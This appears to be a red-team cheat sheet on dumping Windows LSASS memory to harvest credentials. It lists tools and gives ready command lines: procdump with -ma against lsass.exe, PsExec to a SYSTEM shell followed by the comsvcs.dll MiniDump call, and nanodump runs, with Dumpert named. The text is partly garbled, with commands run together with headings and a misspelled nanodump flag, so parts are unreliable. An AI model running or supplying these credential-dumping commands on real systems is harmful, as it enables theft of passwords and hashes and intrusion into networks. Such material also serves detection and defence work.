LSASS Dumping
LSASS - Techniques
Task Manager
Procdump
System Informer
Comsvcs.dll
Nanodump
Dumpert
Lsass Dump: Task Manager



procdump.exe -accepteula -ma lsass.exe lsadump.dmpLsass Dump: System
Informer

Lsass Dump: Comsvcs.dll

./PsExec -i -d -s cmd.exeC:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp fullLsass Dump: Nanodump

./nanodump.x64.exe --write normal_lsass.dmp./nanodump.x64.exe --silen-process-exit .\wer_lsasLsass Dump: Dumpert

Outflank-Dumpert.exeLast updated